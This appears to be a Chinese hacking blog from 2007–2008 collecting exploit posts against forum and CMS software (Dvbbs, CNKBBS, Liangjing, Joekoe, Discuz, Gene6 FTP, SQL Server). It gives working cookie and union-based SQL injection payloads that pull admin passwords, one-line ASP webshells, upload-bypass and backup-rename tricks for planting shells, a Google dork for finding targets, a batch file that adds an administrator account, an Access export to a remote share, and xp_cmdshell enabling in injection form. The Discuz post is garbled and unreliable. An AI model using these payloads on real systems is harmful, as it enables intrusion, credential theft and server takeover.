蜀山劍客's Blog

[0day]Dvbbs8.1 0DAY(通杀Access和mssql版本)

蜀山剑客 — 2008-02-20 08:27 PM

Author:Tr4c3[at]126[dot]CoM
http://www.nspcn.org
http://www.tr4c3.com
谨以此文献给在我老婆不在身边的时候陪我YY,看AV的n37p47ch,King,慕容大雨和BK瞬间群的所有淫棍。

这几天真是无聊的很啊，晚上实在不知道要做什么了，就下了套dvbbs 8.1，然后翻着玩，一不小心翻到了一个注
入漏洞。看来上帝还是很可怜我的。废话不说了。
看代码UserPay.asp行12-64

If Request("raction")="alipay_return" Then
AliPay_Return()
Dvbbs.Footer()
Response.End
ElseIf Request("action")="alipay_return" Then
AliPay_Return()
Dvbbs.Footer()
Response.End
'ElseIf Request("action")="Re_inmoney" Then
' Re_inmoney()
' Dvbbs.Footer()
' Response.End
End If
无论用户提交的raction为alipay_return还是action为alipay_return都调用了AliPay_Return()过程。AliPay_Return()的代码原型在行329-351，代码如下：

Sub AliPay_Return()
If Dvbbs.Forum_ChanSetting(5) <> "0" Then
AliPay_Return_Old()
Exit sub
Else
Dim Rs,Order_No,EnCodeStr,UserInMoney
Order_No=Request("out_trade_no")
Set Rs = Dvbbs.Execute("Select * From [Dv_ChanOrders] Where O_IsSuc=3 And O_PayCode='"&Order_No&"'")
If not(Rs.Eof And Rs.Bof) Then
AliPay_Return_Old()
Exit sub
End if
Response.Clear
Set Rs = Dvbbs.Execute("Select * From [Dv_ChanOrders] Where O_IsSuc=0 And O_PayCode='"&Order_No&"'")
If Rs.Eof And Rs.Bof Then
Response.Write "N"
Else
Response.Write "Y"
Dvbbs.Execute("Update Dv_ChanOrders Set O_IsSuc=3 Where O_ID = " & Rs("O_ID"))
End If
Response.End
End If
End Sub

如果Dvbbs.Forum_ChanSetting(5) <> "0" 就执行下面的sql语句，我们来看看数据库里默认的Forum_ChanSetting吧。

1,1,0,0,pay@aspsky.net,0,b63uvb8nsvsmbsaxszgvdr6svyus0l4t,1,1,1,1,1,1,1,100,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
Forum_ChanSetting(5)缺省为0，好了你接着看就会笑了

Order_No=Request("out_trade_no")
Set Rs = Dvbbs.Execute("Select * From [Dv_ChanOrders] Where O_IsSuc=3 And O_PayCode='"&Order_No&"'")
直接把获取的Order_No放到sql里面去了。
回顾一下DVbbs8.0的Userpay.asp同样一个函数看代码

Sub AliPay_Return()
If Dvbbs.Forum_ChanSetting(5) <> "0" Then
AliPay_Return_Old()
Else
Response.Clear
Dim Rs,Order_No,EnCodeStr,UserInMoney
Order_No = Dvbbs.CheckStr(Request("order_no"))
Set Rs = Dvbbs.Execute("Select * From Dv_ChanOrders Where O_IsSuc=0 And O_PayCode = '"&Order_No&"'")
If Rs.Eof And Rs.Bof Then
Response.Write "N"
可以看出Order_No用CheckStr处理了，不存在sql注入漏洞，为什么到了新版本反而就直接放行了呢？莫非是笔误？
如果你和我一样懒，并不想精心构造语句去搞破坏，只是试图去说明这个地方不安全，用下面的链接验证下看看
吧(需要登录)

http://www.tr4c3.com/UserPay.asp?raction=alipay_return&out_trade_no=1'
本地测试返回图示

如果想再深入点，看看动画吧，懒得打字了。:-)
由于本人没下载到dvbb8.1的sql版本，也懒得去网上找，所以无法判断其版本也存在该漏洞，有条件的朋友看看反馈
下。

经过群里的淫棍樱木花盗测试官方确认mssql版本也受此漏洞影响

COOKIE注入经典原理

蜀山剑客 — 2008-02-20 02:01 PM

大家好,我是初学者,在上一讲中,我们学习了"搜索型注入"的有关知识,今天我们再来学学另一种不常见的注入方法"cookie注入"在讲之前,我们还是来回顾下ASP脚本中Request对象的知识吧,上面几讲中都提到Request对象获取客户端提交数据常用的是GET和POST二种方式,同时request对象可以不通过集合来获得数据,即直接使用"request("name")"但它的效率低下,容易出错,当我们省略具体的集合名称时,ASP是按QueryString,from,cookie,servervariable,集合的顺序来搜索的,在request对象成员中集合cookies,它的意思是"读取用户系统发送的所有cookie值,我们从第二讲关于"cookies欺骗入侵和原理"中知道,cookies是保存在客户端计算机的一个文本文件,可以进行修改,这样一来,我们就可以使用Request.cookie方式来提交变量的值,从而利用系统的漏洞进行注入攻击.

  我们首先还是来看看中网景论坛的最新版本"(CNKBBS2007)中网景论坛2007v5.0 "官方下载地址"http://www.cnetking.com/websys2.asp?id=26"发布时间是2007-06-06,打开系统的源代码后,在"user_RxMsg_detail.asp"文件中,有如下代码:

  (调用opendb.asp文件)

<%

Call CheckUserLogin(username)

Dim action,s,id

id=request("id") (获取客户提交的变量,并赋值给id,并没过滤,也没有指定采用那种方式提交)

if id<>"" then Call IsNum(bid) (这是程序员的出现地方,注意bid<>id)

conn.execute("update cnk_Users_RxMsg set readed=1 where id="&id) '设置已读

rs.open "select * from cnk_users_RxMsg where id="&id,conn,1,3

我们再打开"opendb.asp"文件

<%Option Explicit

Response.Buffer = true%>

(调用fzr.asp文件)

..................

以现它是连接数据库的文件,其中调用了fzr.asp文件,我们再打开fzr.asp文件

<%

'--------版权说明------------------

'SQL通用防注入程序

'Aseanleung

'--------定义部份------------------

Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr

Dim fso1,all_tree2,file1,files,filez,fs1,zruserip

If Request.QueryString<>"" Then (对Request.QueryString提交(客户采用GET方式提交)的数据进行判断,并没有指明对其它方式提交的数据进行判断)

'自定义需要过滤的字串,用 "|" 分隔

Fy_In = "'|;|%|*|and|exec|insert|select|delete|update|count|chr|mid|master|truncate|char|declare|script" (阻止了常用的SQL注入的语句)

Fy_Inf = split(Fy_In,"|")

For Each Fy_Get In Request.QueryString

For Fy_Xh=0 To Ubound(Fy_Inf)

If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then

zruserip=Request.ServerVariables("HTTP_X_FORWARDED_FOR")

If zruserip="" Then zruserip=Request.ServerVariables("REMOTE_ADDR")

Response.Write "内容含有非法字符！请不要有'或and或or等字符，请去掉这些字符再发！！
"

Response.Write "如是要攻击网站，系统记录了你的操作↓
"

Response.Write "操作ＩＰ："&zruserip&"
"

Response.Write "操作时间："&Now&"
"

Response.Write "操作页面："&Request.ServerVariables("URL")&"
"

Response.Write "提交方式：ＧＥＴ
"

Response.Write "提交参数："&Fy_Get&"
"

Response.Write "提交数据："&Request.QueryString(Fy_Get)

......................

    很明显的看出它是一个SQL通用防注入程序文件,(以上的红字是对代码的解释)

代码看好了,我们来整理下思路:由于程序员的出错,导致了id没有被过滤就被带到SQL语句中查询,这是注入漏洞产生的原因,虽然程序引入了防注入程序,阻止了常用的SQL语句使用,但只对客户采用GET方式提交的数据进行判断,而没有对其它方式提交的数据进行判断,这样导致了客户可以使用Request.cookie方式来提交变量的值,而绕过了SQL防注入程序(总结下:cookie注入产生的条件:系统直接使用"request("name")"获取客户提交的数据,并对客户提交的变量没有过滤,而且在防注入程序中没有限制Request.cookie,现在防注入程序3.0只是对客户采用GET和POST提交方式进行了限制).

   原理讲好了,下面我们来学学coolie注入语句吧

   cookies的注入语句:javascript:alert(document.cookie="id="+escape("这就是asp? id=xx后面xx代表的数值) and (这里是注入攻击代码)"));

   这儿用到了javascript语言的知识,我把这语句的意思分解如下,以便大家理解:

1:"alert()"显示信息对话框的alert()方法,它生成的是一个独立的小窗口,称作对话框,用来显示一条信息和一个按钮.(我们在跨站中常用到)

2:"document.cookie"我们在处理cookie时,javascript将它保存为document对象的一个属性,其属性名称是cookie,利用这个属性,我们可以创建和读取cookie数据,在程序中可以使用:"alert(document.cookie)"调用当前页面的cookie数据项值.在我们启动浏览器打开页面后,如果存在相应的cookie,那么它被装入到document对象的cookie属性中,document.cookie属性采用name=value对应方式保存各个cookie数据项值.document(文档)对象表示在浏览器里显示的HTML(向页面输出数据),cookie属性是允许读写HTTP的cookie;字符串类型

4:escape()函数;它将字符串中所有的非字母字符转换为用字母数字表示的等价字符串,具有编码字符串的功能.一般情况下,cookie通常由服务器端的程序通过HTTP请求和响应头发送给浏览器,但是,利用javascript,可以在本地浏览器中设置cookie

格式:name=value的属性是指定cookie数据项的名称,value是该名称对应的值,它是一个字符串,也可是由一系列字符组成,name和value中不能包含分号,逗号及空白,(50"and 1=1")有分号,逗号及空白,所以我们要用到escape()函数对他们进行编码

   上面整句的意思大家都明白了吧,就是设置调用当前创建的cookie数据项值,在设置cookie时,它们首先保存在浏览器的内存中,退出浏览器时,才能被写入到硬盘中.(这就是在下面操作中为什么在退出后,再输入链接的地址原因)

最后我们来测试下,利用步骤:

1:打开在本地机子上架设的中网景论坛:注册一个用户,我们就会收到管理员发来的一条短信息,我们打开短信息的链接(注意这儿的参数id值)

2:把浏览器的URL清空,输入"javascript:alert(document.cookie="id="+escape("相应参数id值 and 1=1"));之后会弹出一个框框,

3:再次输入:http://127.0.0.1/cnkbbs5.2_ac/user_RxMsg_detail.asp?username=论坛管理员(返回正常的页面,说明我们绕过了SQL防注入程序了)

3:再输入:javascript:alert(document.cookie="id="+escape("1 and 1=2"));然后再输入:http://127.0.0.1/cnkbbs5.2_ac/user_RxMsg_detail.asp?username=论坛管理员(时间和内容都没有显示了,说明我们可以进行注入了)

4:通过查看系统数据库,得知cnk_users_RxMsg 表里有8个字段,Cnk_Admin表是存放管理员资料的,其中AdminName,AdminPassword字段分别对应的是账号和密码,我们使用联合查询语句,再输入:javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,2,3,4,5,6,7,8 from Cnk_Admin"))然后把地址栏清空,输入http://127.0.0.1/cnkbbs5.2_ac/user_RxMsg_detail.asp,可经看到显示了数字4和5

5:再次把地址栏清空,输入:javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,2,3,AdminName,AdminPassword,6,7,8 from Cnk_Admin")),提交后,清空地址栏,输入:http://127.0.0.1/cnkbbs5.2_ac/user_RxMsg_detail.asp?username=论坛管理员,这样我们就在页面上看到管理员的密码和账号了

突破数据库中有LOOP 不能插马的问题！

蜀山剑客 — 2007-08-13 00:52 AM

突破 ASP数据库不能插马

<%execute request("value")%><%'<% loop <%:%>
是这样的顺序才行，也可以是以下顺序
<%'<% loop <%:%><%execute request("value")%>
或
<%execute request("value")'<% loop <%:%>

[转]SQL注入Access导出WebShell？

蜀山剑客 — 2007-08-13 00:44 AM

By:lake2

已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了，也只是听说而已，具体的细节还是不得而知。

最近在看的书中一章提到Jet的安全，然后灵光一闪，呵呵，发现了一种可以利用access导出asp的方法，分享之。

几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件（可导出txt、htm、html等格式）的方法：

SELECT * into [test.txt] in 'd:\web\' 'text;' from admin

执行上述语句，在d:\web目录下就会生成test.txt文件，其内容就是表admin的内容。但是导出asp格式就不行，会说“不能更新，数据库或对象为只读”。

其实控制导出文件后缀是存储在注册表的，具体键值是HKEY_LOCALMACHINE\Software\Microsoft\Jet\4.0\Engines\Text\DisableExtension，默认情况下值为“!txt,csv,tab,asc,tmp,htm,html”，如果我们把asp也添加进去的话，呵呵，就可以导出asp格式的文件了。

这个方法跟那个调用Access的Shell函数执行命令一样，要修改注册表，所以利用不是很大。

顺便提一下，前面提到的导出文本文件的方法如果不知道web路径貌似可以导出到自己机器的哦：SELECT * into [test.txt] in '\\yourip\share' 'text;' from admin

良精企业网站管理系统漏洞

蜀山剑客 — 2007-08-12 04:40 PM

精企业网站管理系统Sql注入漏洞
Author:Tr4c3[at]126[dot]com
http://www.nspcn.org
http://www.tr4c3.com
涉及版本：良精企业网站管理系统(2007-V09)官方正式商业版
其他版本未做测试

漏洞文件：
EnProductShow.asp

漏洞描述：
变量ID信任客户端提交值，带入sql语句查询，程序用了通用SQL防注入程序，详细见Check_Sql.asp。关键代码如下
****************************************************************************

ID=trim(request("ID"))
if ID="" then
response.Redirect("EnProduct.asp")
end if

sql="select * from Product where ID=" & ID & ""
Set rs= Server.CreateObject("ADODB.Recordset")
rs.open sql,conn,1,3
if rs.bof and rs.eof then
response.write"alert('找不到此产品！');"
response.write"javascript:history.go(-1)"
else
rs("Hits")=rs("Hits")+1
rs.update

****************************************************************************
Check_Sql.asp仅对GET和POST的数据进行了过滤，忽略了Cookie

利用方法：
Google搜索关键字 inurl:"EnProductShow.asp?id="
cookie注入，支持union，Product表26个字段，演示如下

1.http://www.Tr4c3.com/EnProductShow.asp?ID=229

2.javascript:alert(document.cookie="id="+escape("229 union select 0,1,2,3,4,5,6,username,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from admin"))

3.http://www.tr4c3.com/EnProductShow.asp

即可union出管理员帐号，密码（md5值）
后台地址
/admin/login.asp
后台拿shell方法很多。

说个简单拿shell的方法吧，备份数据库，但是有朋友说访问是404，看看下面的就明白了

Admin_DataBackup.asp里面里有段代码是这样写的

Dbpath=request.form("Dbpath")
Dbpath=server.mappath(Dbpath)
bkfolder=request.form("bkfolder")
bkdbname=request.form("bkdbname")
Set Fso=server.createobject("scripting.filesystemobject")
if fso.fileexists(dbpath) then
If CheckDir(bkfolder) = True Then
fso.copyfile dbpath,bkfolder& "\"& bkdbname
else
MakeNewsDir bkfolder
fso.copyfile dbpath,bkfolder& "\"& bkdbname & ".asa"
end if
response.write "备份数据库成功，备份的数据库为 " & bkfolder & "\" & bkdbname & ".asa"

注意这几句
bkdbname=request.form("bkdbname")

If CheckDir(bkfolder) = True Then
fso.copyfile dbpath,bkfolder& "\"& bkdbname

response.write "备份数据库成功，备份的数据库为 " & bkfolder & "\" & bkdbname & ".asa"

后台的数据库备份，如果你指定备份为trace.asp，他就保存到dbpath,bkfolder&"trace.asp"
但是提示是备份数据库成功，备份的数据库为 " & bkfolder & "\" & trace.asp & ".asa"，看明白了吧，直接提交地址到IE吧，不要后面的.asa了

Discuz6.0 injection 0day

蜀山剑客 — 2007-08-12 02:41 PM

// 允许程序在 register_globals = off 的环境下工作
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');

if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}

$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");

/*===================== 身份验证 =====================*/
if($admin['check'] == "1") {
if ($_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "";
echo "注销成功......

三秒后自动退出或单击这里退出程序界面 >>>";
exit;
}

if ($_POST['do'] == 'login') {
$thepass=trim($_POST['adminpass']);
if ($admin['pass'] == $thepass) {
setcookie ("adminpass",$thepass,time()+(1*24*3600));
echo "";
echo "登陆成功......

三秒后自动跳转或单击这里进入程序界面 >>>";
exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== 验证结束 =====================*/

// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
---------------------------------------------------------------------------------------------------------------------
http://www.discuz.net/admin/logging.php?action=login
可以跳到其它目录
注册登录后利用

http://www.discuz.net/search.php?user%id=100
可以进行injection……

只能手工注射

注意:showpath里必须包含用户自己的路径
如果限制的话，还可以向上跳,向上级传文件的时候，不能直接
http://www. http://www.discuz.net/user/up/_id=../../....../(注射语句)
就包含用户路径
http://www.discuz.net/member.php?action=list_UserNumber=1402257EE8F
不然不能进行注射。

文件漏洞代码如下
define('__SYSTEM_ROOT', '');
include dirname(__FILE__).'/framework_gb/framework.php';

using('System.Data.Data');
using('System.Data.Plugins.Option');
using('System.Page.Page');
using('System.Smarty.Smarty');
using('System.Functions.Functions');

require_once __SYSTEM_ROOT."global.php";
require_once __SYSTEM_ROOT."vars.php";

$db=new stdClass();

$db=$Data->getDB();
/*

echo '

';
print_r($Data);
*/
?>
可以直接注射,拿到后台密码。

Gene6 FTP 提权方法

蜀山剑客 — 2007-08-12 02:27 PM

在任意帐户配置文件中添加SiteCommandList0=-1,TQ1,c:\a.bat,0,60,0,0,jid

TQ1=命令名

c:\a.bat=实际路径

如果没有修改权限,也可以从本地走~~~

以下为本地管理员配置

[Server]
IP=127.0.0.1,8021\r\n
GrantAllAccessToLocalHost=0
[Acct=chensong]
Enabled=1
Rights=0
Password=58F6E4407FFE8F618CDE3C16FA3360DD

1. 以非特权用户的身份登陆。

2. 打开Gene6 FTP Server控制台，添加FTP用户帐号，如"test"

3. 对FTP server添加新的SITE命令。如果要实现这个操作，你必须将可执行文件映射到新建的SITE命令。详见4和5步。

4. 编写一个名为ABC.bat的.bat文件。

---cut here -------------------------
net user abc /add
net localgroup administrators abc /add
---cut here -------------------------

5. 将这个ABC.bat映射到新建的SITE命令，如ABC

6. 现在就可以获取SYSTEM权限了。使用test用户登陆到FTP server，然后执行以下命令：
ftp>quote site abc

这样就以SYSTEM权限执行了ABC.bat。

当然，还可以映射任何其他可执行文件。

乔客(joekoe) CMS 4.0 的2个高危漏洞

蜀山剑客 — 2007-08-12 02:24 PM

乔客(joekoe) CMS 4.0 的2个高危漏洞

转载请保留版权标记,谢谢
-------------------------------by 大蝉@http://blog.gsnsg.com/weblog/usual/ QQ:271607603------------------------------------------

    前段时间看了朋友冷锋的江苏黑客联盟,顺便读了读乔客,发现在乔客4.0版本中存在两个高危漏洞,一个上传漏洞,可以随意上传任意文件,包括ASP,另一个是SQL注入,甚至还有返回错误信息,可怕啊

    上传漏洞:
看\common\include\web.upload.asp 中的代码

-----------------------------------------------------------------------------------------------------------------------------------

sub doPageLoad()
if APP_STATUS="close" then
  treeData.addItem "_status","error.message"
  treeData.addItem "_message","网站暂时因关闭维护中！请稍候..."
  exit sub
end if
up.doInit()
if not upConfig.isInit then
  treeData.addItem "_status","error.message"
  treeData.addItem "_message","上传文件的参数不正确！"
else
  doPageLoadUser()
  select case upConfig.channel
  case "forum"
   upConfig.setSaveDir(upConfig.getSaveDir&(left(ops.time.toConvertString("",10),6)&DIR_SEPARATOR))
   upConfig.filename=""
  case "user.face"
   upConfig.filename="face_"&upConfig.userid
   upConfig.setSaveDir("face"&DIR_SEPARATOR)
   upConfig.filetype="gif"
  case "blog.logo"
   upConfig.setSaveDir("blog"&DIR_SEPARATOR)
   upConfig.filetype="gif"
  case else
   if instr(upConfig.channel,".")>0 then
    upConfig.setSaveDir(mid(upConfig.channel,1,instr(upConfig.channel,".")-1)&DIR_SEPARATOR)
   end if
   if instr(upConfig.fileinput,"url")>0 then
    upConfig.filetype="affix"
   end if
  end select
  if len(upConfig.getSaveDir())<3 then
   treeData.addItem "_status","error.message"
   treeData.addItem "_message","上传文件的参数不正确！"
   exit sub
  end if

  if 1=1 then
   upConfig.setData "zoom.channel.width",120
   upConfig.setData "zoom.channel.height",90
  end if

  upConfig.setBaseDir(DIR_ROOT&DIR_UPLOAD)
  upConfig.setBasePath(opsDirPath(DIR_ROOT&DIR_UPLOAD))
  upConfig.setBaseURL(URL_UPLOAD)
  up.doLoad()
end if
end sub

-----------------------------------------------------------------------------------------------------------------------------------

这段代码通过channel判断是否给上传类型赋值,如果channel不等于forum、user.face、blog.logo的时候判断fileinput是否包含url，如果不包含，upConfig.filetype就不赋值，继续往下看
------------------------------------------------------------------------
  if up.isPost() then
   call doParseUploadData()
   treeData.addItem "_status","succeed"
   dim tmpFormMode,tmpFileValue,tmpThumbValue
   tmpFormMode="set"
   if upConfig.channel="user.face" then
    tmpLinkMode="no"
    tmpFileValue="#"&up.getFileInfo("filename")
   else
    tmpFileValue=up.getFileInfo("file.path")
    select case upConfig.filetype
    case "file"
     tmpLinkMode="no"
     'tmpFileValue=up.getFileInfo("file.path")
    case "pic","spic","pics","affix","gif","jpg","jpeg","bmp","png"
     tmpLinkMode="no"
     tmpThumbValue=up.getFileInfo("thumb.path")
    case else
     tmpLinkMode="again"
     tmpFormMode="append"
     dim tmpFileType:tmpFileType=lcase(up.getFileInfo("filetype"))
     select case tmpFileType
     case "gif","jpg","jpeg","bmp","png"
      tmpFileValue=""
     case "swf"
      tmpFileValue="[flash=350,250]upload/"&up.getFileInfo("file.path")&"[/flash]"
     case else
      tmpFileValue="[download="&tmpFileType&"]upload_download.asp?id="&upConfig.fileid&"[/download]"
     end select
    end select
   end if
   treeData.addItem "_form.mode",tmpFormMode
   treeData.addItem "_form.filevalue",tmpFileValue
   treeData.addItem "_form.thumbvalue",tmpThumbValue
  end if
----------------------------------------------------------------------------------------------------
这段代码判断upConfig.filetype，然后定义上传文件的后缀名，只要之前upConfig.filetype没被赋值，且不是gif,jpg,jpeg,bmp,png,swf,就

tmpFileValue="[download="&tmpFileType&"]upload_download.asp?id="&upConfig.fileid&"[/download]"，看到这个，大家眼睛都放光了，根据用户的定义来判断上传类型，就好比问一个要偷东西的人：“你是贼么？”，这段代码也太XX了，估计之前也有不少人读出来了，只不过没公开而已

    SQL注入漏洞
还是在web.upload.asp中：
--------------------------------------------------------------------------------------------------------
...........
sub doParseUploadData()
dim tmpFilePath,tmpFileType,tmpFileSize,tmpName
tmpFilePath=up.getFileInfo("file.path")
tmpFileType=up.getFileInfo("filetype")
tmpFileSize=opsCommon.toInt(up.getFileInfo("filesize"))
tmpName=up.getFileInfo("name")
dim tmpChannel,tmpDataid,tmpType,tmpSQL,tmpID
tmpChannel=upConfig.channel
tmpDataid=0
tmpType=0
select case upConfig.channel
case "user.face"
  tmpDataid=upConfig.userid
  tmpChannel="face"
  tmpType=1
  tmpSQL="select top 1 u_id from db_sys_upload where nsort='"&tmpChannel&"' and iid="&tmpDataid&""
case "blog.logo"
  tmpDataid=toInt(ops.client.getSession("user.blogid"))
  if tmpDataid<1 then tmpDataid=upConfig.userid
  tmpChannel="blog"
  tmptype=1
  tmpSQL="select top 1 u_id from db_sys_upload where nsort='"&tmpChannel&"' and iid="&tmpDataid&""
case else
  tmpSQL="select top 1 u_id from db_sys_upload where u_url='"&tmpFilePath&"'"
end select
..........
-------------------------------------------------------------------------------------------------------------
看这句tmpSQL="select top 1 u_id from db_sys_upload where u_url='"&tmpFilePath&"'"，u_url来自&tmpFilePath&，而&tmpFilePath&来自up.getFileInfo("file.path")，呵呵，没有经过任何过滤就放到SQL查询语句里面查询了。

利用方法：
        1 .上传漏洞：很好利用，把channel变量改一下，只要不等于forum、user.face、blog.logo就行，然后filetype改成asa,就可以光明正大的上传木马了，具体url可以这样common/upload.asp?channel=use&filetype=asa&filename=&fileinput=u_face&formname=&thumbname=&thumbinput=，然后上传

        2. SQL注入漏洞：在Channel变量中加入诸如语句，比如：common/upload.asp?channel=use'&filetype=gif&filename=&fileinput=u_face&formname=&thumbname=&thumbinput=,然后上传，就会报错
----------------------------------------------------------------------------------------------------------------------------------

Joekoe CMS 4.0
错误信息:
select top 1 u_id from db_sys_upload where u_url='user'/20070722031234c.gif'
原始错误:
Error #-2147217900, 第 1 行: 'c' 附近有语法错误。 Microsoft OLE DB Provider for SQL Server
返回首页
Processed in 0.188 s, 1 queries, 54 Cache.

-----------------------------------------------------------------------------------------------------------------------------------
注入的时候有一定要注意，在执行到漏洞代码之前，会建立以Channel变量命名的文件夹，如果文件夹建立失败，就无法执行到漏洞代码，所以诸如语句里面不能有<>|"?*:/\，还有，注入代码执行后，会在upload文件夹下面建立以Channel变量命名的文件夹，也就是说如果你的诸如语句是use' DROP TABLE Tmp--,那么他的upload目录下就会多个叫做use' DROP TABLE Tmp--的目录，*_*是不是很恐怖，刚发现这个漏洞的那天晚上去搞官网，留下了几十个这样的BT目录，结果第二天被发现了，换了管理员帐号密码 *_*

    几年前用乔客的网站随处可见,现在已经很少了,为什么?看了代码我才明白,艾,要发展还得靠努力啊

    开发人员应该已经知道了这两个漏洞的存在,但是迟迟没有出补丁,一直到现在都没有见到这两个漏洞的补丁,真是搞不懂........

利用录像:www.cub007.cn/demo/qiaoke.exe  下载后把后缀名改成rar打开

PHP 5.2.3的两个local exploit

蜀山剑客 — 2007-08-12 02:11 PM

PHP 5.2.3的两个local exploit

1。PHP 5.2.3 Tidy extension Local Buffer Overflow Exploit
2。PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit

如图：

成功溢出后打开 33333 端口
点击下载此文件

sql server 2005 ，恢复xp_cmdshell的办法

蜀山剑客 — 2007-07-26 11:39 PM

用下面一句话就可以了解决了。

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

关闭一样.只是将上面的后面的那个"1"改成"0"就可以了.

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;

########################################################################################
两种方式:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

OR :

;EXEC sp_configure 'show advanced options', 1 --

;RECONFIGURE WITH OVERRIDE --

;EXEC sp_configure 'xp_cmdshell', 1 --

;RECONFIGURE WITH OVERRIDE --

;EXEC sp_configure 'show advanced options', 0 --